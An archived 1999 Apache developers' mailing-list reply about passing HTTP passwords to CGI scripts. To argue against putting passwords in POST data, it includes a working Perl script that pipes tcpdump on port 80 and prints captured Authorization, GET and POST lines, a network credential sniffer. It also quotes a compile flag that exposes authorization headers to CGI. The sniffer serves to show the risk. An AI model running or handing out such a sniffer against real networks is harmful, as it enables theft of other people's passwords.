Return-Path: <new-httpd-owner-new-httpd-archive=hyperreal.org@apache.org>
Delivered-To: new-httpd-archive@hyperreal.org
Received: (qmail 6204 invoked by uid 6000); 4 Aug 1999 13:23:58 -0000
Received: (qmail 6193 invoked from network); 4 Aug 1999 13:23:56 -0000
Received: from astro.fccj.cc.fl.us (207.203.47.7)
  by taz.hyperreal.org with SMTP; 4 Aug 1999 13:23:56 -0000
Received: from [207.203.95.5] (elroy.fccj.org [207.203.95.5])
	by astro.fccj.cc.fl.us (8.9.1/8.9.1) with ESMTP id JAA06438
	for <new-httpd@apache.org>; Wed, 4 Aug 1999 09:20:59 -0400 (EDT)
Message-Id: <199908041320.JAA06438@astro.fccj.cc.fl.us>
X-Mailer: Microsoft Outlook Express Macintosh Edition - 4.5 (0410)
Date: Wed, 04 Aug 1999 09:25:19 -0400
Subject: Re: Passing passwords to CGI
From: "Bill Jones" <bill@fccj.org>
To: new-httpd@apache.org
Mime-version: 1.0
X-Priority: 3
Content-type: text/plain; charset="US-ASCII"
Content-transfer-encoding: 7bit
Sender: new-httpd-owner@apache.org
Precedence: bulk
Reply-To: new-httpd@apache.org
Status: O

 Graham wrote:

> Dirk-Willem van Gulik wrote:
> 
>> > Is there a "correct" way of doing this?
>>
>> No, of course not :-) but the solution is
>>
>> Adding to your cflags
>>
>>         CFLAGS += -DSECURITY_HOLE_PASS_AUTHORIZATION
>>
>> Do a grep in the source (util_script.c) for the full story.
>
> Here's a thought - how about including the capability for passwords to
> be inserted into the POST data that a CGI reads via stdin, ie the
> password could be read as if it was simply another option on a form.
>
> The name of this POST variable would be configurable so it didn't clash
> with any existing variables in CGI.
>
> Is this a good idea? If so, I'll try get it to work.
>
> Regards,
> Graham


Here is why you don't want to do that:

#!/usr/bin/perl

$LIMIT = shift || 5000000;

$|=1;
open (STDIN,"/usr/sbin/tcpdump -lnx -s 1024 dst port 80|");
while (<>) {
    if (/^\S/) {
        last unless $LIMIT--;
        while ($packet=~/(GET|POST|WWW-Authenticate|Authorization).+/g)  {
            print "$client -> $host\t$&\n";
        }
        undef $client; undef $host; undef $packet;
        ($client,$host) = /(\d+\.\d+\.\d+\.\d+).+ > (\d+\.\d+\.\d+\.\d+)/
            if /P \d+:\d+\((\d+)\)/ && $1 > 0;
    }
    next unless $client && $host;
    s/\s+//;
    s/([0-9a-f]{2})\s?/chr(hex($1))/eg;
    tr/\x1F-\x7E\r\n//cd;
    $packet .= $_;
}


/^HTH$/i;
-Sneex-  :]
______________________________________________________________________
Bill Jones  Data Security Specialist  http://www.fccj.org/cgi/mail?dss
  http://certserver.pgp.com:11371/pks/lookup?op=get&search=0x37EFC00F
  http://www.networksolutions.com/cgi-bin/whois/whois?BJ1936

         Jacksonville Perl Mongers
         http://jacksonville.pm.org
         jax@jacksonville.pm.org